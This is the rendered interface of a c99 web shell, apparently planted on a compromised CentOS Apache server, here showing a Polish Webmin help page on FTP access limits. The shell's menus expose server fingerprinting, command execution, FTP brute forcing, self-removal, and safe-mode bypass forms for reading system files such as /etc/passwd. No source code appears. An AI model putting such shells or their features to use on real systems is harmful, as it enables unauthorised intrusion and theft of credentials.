!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/wuftpd/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     acl.pl.html (1.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Ograniczenia i kontrola dostępu
Strona zawiera tabale umożliwiające ustalenie limitów i kontroli dostępu do serwera FTP.

Pierwsza tabela umożliwia wyspecyfikowanie adresów IP, które nie mają prawa dostępu do serwera FTP, oraz zbioru zawierającego komunikat błędu wyświetlany klientowi w takiej sytuacji. Adresy mogą być podane w postaci pełnego lub częściowego adresu IP, kombibacji podsieć IP/maska, nazw komputerów (z rozwijanymi znakami * i ?, jak na przykład*.foo.com), oraz absolutnych ścieżek do plików zawierających adresy. W celu zanegowania każdy adres może być poprzedzony wykrzyknikiem !.

Druga tabela umożliwia ograniczenie liczby jednoczesnych użytkowników w każdej z klas. Dla każdej klasy można wporowadzić maksymalna liczbę wlogowanych użytkowników, czas w którym ograniczenie jest obowiązujące (w stylu UUCP: jak na przykład MoTuTh0800-1700), oraz zbiór z komunikatem błędu wyświetlanym klientowi gdy limit zostanie osiągnięty.

Trzecia tabela umożliwia wprowadzenie ograniczenia liczby plików oraz bajtów przesyłanych podczas jednej sesji. Dla każdego limitu należy określić czy dotyczy liczby plików, czy bajtów, jakiego dotyczy kierunku, czy brać pod uwagę tylko pliki, czy wszystkie dane, oraz klasę użytkowników, której dany limit dotyczy.

Czwarta tabela pozwala na zakaz dostępu do określonych zbiorów. Dla każdego zbioru należy wprowadzić absolutną ścieżkę, określić czy jest ona podana względem "chroot" (dla użytkowników anonimowych i gości) oraz klasy użytkowników, których dotyczy ograniczenie. Jeżeli zbiór kończy się znakiem /, serwer FTP nie zezwoli na dostęp do żadnego pliku z kartoteki o tej nazwie. Podobna piąta tabela umożliwia zezwolić na dostęp do plików, który w przeciwnym wypadku byłby zakazany przez dotychczasowe reguły.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0126 ]--